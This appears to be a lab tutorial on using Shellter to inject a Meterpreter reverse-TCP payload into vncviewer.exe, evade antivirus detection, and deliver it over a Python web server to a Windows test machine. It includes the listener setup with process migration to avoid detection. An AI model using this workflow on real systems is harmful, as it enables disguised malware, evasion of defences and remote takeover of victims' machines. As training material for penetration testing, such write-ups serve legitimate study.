Shellter is an antimalware evasion tool that is commonly used by ethical hackers and penetration testers to automate the process of creating and encoding custom payloads to evade threat detection systems. Shellter handles the generation of shellcode and injects it into a trusted Microsoft Windows 32-bit application. When the custom payload is executed on a targeted system, the trusted files are executed as if the application is benign, but the custom payload (shellcode) is executed in the background within the memory space.
Installation:
sudo apt update
sudo apt install shellter

Configuration of shellter:
- configure the working environment for Shellter and install
Wine32:
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install wine32
- List all the windows binaries in kali linux:
ls -l /usr/share/windows-binaries/

- Next, let’s use the following commands to copy the
vncviewer.exefile to our current working directory, as it’s perceived as a harmless file:
cp /usr/share/windows-binaries/vncviewer.exe /home/kali

- It would be great if you once restart the machine for the changes we made earlier.
using shellter:
- Next, use the following commands to launch the Shellter application on Kali Linux:
sudo shellter
2. Next, when the Shellter window appears, you will be provided with the option to use Shellter in automatic or manual mode – type A and hit Enter to apply automatic mode:

In automatic mode, Shellter dynamically analyzes the Portable Executable (PE) file to identify a suitable injection point, whereas manual mode offers more control to the user.
- specify the
vncviewer.exefile within/home/kali/directory
To learn more about PE format, please visit https://learn.microsoft.com/en-us/windows/win32/debug/pe-format.
- Shellter will determine where it can inject shellcode within the PE file. Once this process is completed,
type Y and hit Enter to enable stealth mode, chooseLfor Listed payloads, then choosemeterpreter_reverse_tcpby index1, then setLHOST, LPORT:

- After completion Click enter then:

- Upload the encoded
vncviewer.exetovirustotalfor analysis:

Setting up a metapreter listener:
kali@kali:~$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.30.1.50
msf6 exploit(multi/handler) > set LPORT 5678
msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/ migrate
msf6 exploit(multi/handler) > exploit

COMMAND BREAKDOWN:
- The
windows/meterpreter/reverse_tcppayload ensures that, when a connection is detected, Metasploit will send this payload to the targeted system, which will execute within memory and create a reverse shell back to the Kali Linux machine. - The
LHOST and LPORTparameters are used to set the local IP address and listening port on Kali Linux. - The
AutoRunScript post/windows/manage/migratecommand ensures that, once a connection has been established from the victim system to Kali Linux, Metasploit will automatically migrate the process on the targeted system to another process to reduce detection. - The
exploitcommand is used to execute a payload or exploit module within Metasploit.
Delivery:
- Delivering the
vncviewer.exepayload to our windows 10 enterprise machineTHESPIDERMAN - We will use
python http moduleto do that, write the following command into the terminal:
python3 -m http.server 8000
3. Open the target windows machine and head over to your Network IP, whichever Network you created, mine is on the 172.30.1.0/24 network.
The Python3 web server will enable us to download files from the Kali Linux machine onto other systems within our lab environment
4. Download the file and execute it
5. We will get a reverse shell back to our listener:

Not all Windows-based executables will work with Shellter. When working with Shellter, it is important to ensure the PE file that is encoded with shellcode from Shellter executes long enough on the targeted system for the staged payload to be delivered from Kali Linux to the target. Keep in mind that executables that are heavily protected or use non-standard PE structures might pose challenges.